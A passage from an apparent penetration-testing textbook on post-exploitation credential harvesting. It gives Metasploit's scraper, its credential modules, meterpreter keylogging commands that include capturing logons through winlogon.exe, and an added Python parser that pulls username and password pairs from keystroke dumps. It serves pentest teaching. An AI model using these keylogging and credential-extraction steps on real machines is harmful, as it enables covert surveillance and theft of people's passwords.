Postexploitation ◾ 261
The combination of winenum and scraper is very fruitful. Scraper gathers the same kind of information as winenum but goes one step further and also harvests other interesting data, such as the password hashes and a dump of the entire registry. We can use the “run scraper” command from meterpreter to execute the script. The output is stored in the /root/.msf4/logs/scripts/scraper directory.
Harvesting Stored Credentials
Browsers store interesting data such as the history of websites visited and saved passwords. Stored passwords can allow you to gain further access to a company’s e-mail, personal e-mail, and so on, which could contain sensitive information as well. Once you have access to an e-mail account, you can download the address book and perform client-side attacks, such as phishing, to compromise other e-mail accounts.
Metasploit has plenty of post-exploitation modules for this purpose; they can be found in the post/windows/gather/credentials directory. These modules can harvest credentials saved by different software, such as FileZilla and Outlook.
If passwords are not stored inside the browser or any other application, we can use an alternative approach, which involves using a keylogger. A keylogger is a program that captures every keystroke performed by the victim. Meterpreter has a built-in keystroke sniffer that can help us accomplish this task. We have to start the keylogger on the victim’s machine and wait until the victim logs in to a website or any other application. To start the keylogger, just run the following command:
meterpreter > keyscan_start
262 ◾ Ethical Hacking and Penetration Testing Guide
Now, to check whether our keylogger has captured any keystrokes (and, with luck, a password), we will use the following command:
meterpreter > keyscan_dump
Note: Make sure that you have migrated to explorer.exe before starting the keystroke sniffer. The sniffer only sees the keystrokes of the desktop session that the process hosting meterpreter belongs to, and explorer.exe runs in the logged-on user’s interactive session.
In this case, it has not captured any keystrokes yet; as soon as the victim starts typing, we will see the keystrokes on our screen. If we want to capture the credentials of all users logging in to the machine, we need to migrate to the winlogon.exe process and start the keylogger again. This requires SYSTEM privileges, since winlogon.exe runs as SYSTEM.
Alternatively, there is a more convenient meterpreter script called “keylogrecorder”. This script automatically saves the recorded keystrokes in a database for later analysis. The script can be executed with the following command:
meterpreter > run keylogrecorder
By default it migrates to the explorer.exe process and starts capturing keystrokes. If you would like to record the Windows logon credentials instead, you need to pass the additional parameter -c followed by 1 (“run keylogrecorder -c 1”), which makes the script migrate to winlogon.exe before capturing.
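Both keyscan_dump and keylogrecorder leave you with a raw stream of key names rather than readable text: Backspace corrections, Tab presses between form fields and Enter presses are all printed as tokens. The following parser is an added example for analysing such a capture offline; it is not code from the book or from Metasploit. It assumes the token spellings the meterpreter console prints (<Back>, <Tab>, <CR> or <Return>, <Shift>, <Ctrl>, ...), which vary between Metasploit versions, so the token tables are an assumption to adjust for your build, and the sample capture is constructed, not recorded from a real victim.

```python
"""Reconstruct what a victim typed from meterpreter keyscan_dump / keylogrecorder output.

Added example, not Metasploit code. The special-key names below are assumptions based on
what the meterpreter console prints; older builds print <Return>, newer ones <CR>, and the
exact set differs per version, so extend the tables for the build you are using.
"""
import re

# Modifier and navigation keys that add no characters to the typed text.
MODIFIER_TOKENS = {
    "<Shift>", "<LShift>", "<RShift>", "<Ctrl>", "<LCtrl>", "<RCtrl>",
    "<Alt>", "<LAlt>", "<RAlt>", "<LWin>", "<RWin>", "<CapsLock>", "<NumLock>", "<Esc>",
}
ENTER_TOKENS = {"<CR>", "<Return>"}          # both spellings, depending on version
BACKSPACE_TOKENS = {"<Back>", "<Backspace>"}
TAB_TOKEN = "<Tab>"

# One token per angle-bracket key name, otherwise one printable character.
TOKEN_RE = re.compile(r"<[^<>]+>|.")


def tokenize(dump: str):
    """Drop the console banner and line breaks, then split the capture into key tokens."""
    body = "".join(
        line for line in dump.splitlines()
        if line.strip() and not line.startswith("Dumping captured keystrokes")
    )
    return TOKEN_RE.findall(body)


def reconstruct(dump: str):
    """Replay the keystrokes into a text buffer.

    Returns (submitted, pending): `submitted` holds one string per Enter press, with
    <Tab> kept as '\\t' so form fields stay separable; `pending` is whatever was typed
    after the last Enter (for example a password the victim has not submitted yet).
    """
    submitted, buf = [], []
    for tok in tokenize(dump):
        if tok in ENTER_TOKENS:
            submitted.append("".join(buf))
            buf = []
        elif tok in BACKSPACE_TOKENS:
            if buf:                      # Backspace on an empty field is a no-op
                buf.pop()
        elif tok == TAB_TOKEN:
            buf.append("\t")
        elif tok in MODIFIER_TOKENS:
            continue                     # shifted characters already arrive shifted
        else:
            buf.append(tok)              # printable char, or an unknown key kept verbatim
    return submitted, "".join(buf)


def credential_candidates(submitted):
    """Heuristic: 'user<Tab>password<Enter>' is the usual login-form typing pattern."""
    pairs = []
    for entry in submitted:
        fields = entry.split("\t")
        if len(fields) == 2 and all(fields):
            pairs.append((fields[0], fields[1]))
    return pairs


# Constructed sample in keyscan_dump's shape (not a real capture): the victim types a
# portal address, mistypes the password and fixes it with Backspace, then starts a
# note that has not been submitted when the dump is taken.
SAMPLE_DUMP = """Dumping captured keystrokes...
<Shift>portal.example.local<CR>
jsmith<Tab><Shift>Summ3r<Back><Back>er2014<Shift>!<CR>
meeting notes draft
"""

if __name__ == "__main__":
    done, pending = reconstruct(SAMPLE_DUMP)
    for entry in done:
        print("submitted:", repr(entry))
    print("pending:  ", repr(pending))
    for user, password in credential_candidates(done):
        print(f"candidate credential -> user={user!r} password={password!r}")
```

Run it against the text you paste from keyscan_dump or the file keylogrecorder writes; the Tab-separated pair heuristic is deliberately crude, so review the full `submitted` list rather than trusting only `credential_candidates`.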